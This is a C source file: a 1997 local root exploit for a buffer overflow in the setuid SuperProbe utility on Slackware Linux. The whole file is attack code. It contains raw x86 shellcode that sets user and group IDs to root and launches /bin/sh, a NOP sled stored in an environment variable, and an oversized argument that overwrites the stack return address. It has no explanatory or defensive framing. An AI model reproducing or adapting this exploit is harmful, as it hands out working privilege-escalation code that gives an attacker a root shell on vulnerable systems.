/*
* SuperProbe buffer overflow exploit for Linux, tested on Slackware 3.1
* Copyright (c) 1997 by Solar Designer
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

char *shellcode =
  "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
  "\xff\xd4\x31\xc0\x8d\x51\x04\x89\xcf\x89\x02\xb0\x2e\x40\xfc\xae\x75\xfd"
  "\x89\x39\x89\xfb\x40\xae\x75\xfd\x88\x67\xff\xb0\x0b\xcd\x80\x31\xc0\x40"
  "\x31\xdb\xcd\x80/"
  "/bin/sh"
  "0";

char *get_sp()
{
  asm("movl %esp,%eax");
}

#define bufsize 8192
#define alignment 0
char buffer[bufsize];

main()
{
  int i;

  for (i = 0; i < bufsize / 2; i += 4)
    *(char **)&buffer[i] = get_sp() - 2048;
  memset(&buffer[bufsize / 2], 0x90, bufsize / 2);
  strcpy(&buffer[bufsize - 256], shellcode);
  setenv("SHELLCODE", buffer, 1);

  memset(buffer, 'x', 72);
  *(char **)&buffer[72] = get_sp() - 6144 - alignment;
  buffer[76] = 0;

  execl("/usr/X11/bin/SuperProbe", "SuperProbe", "-nopr", buffer, NULL);
}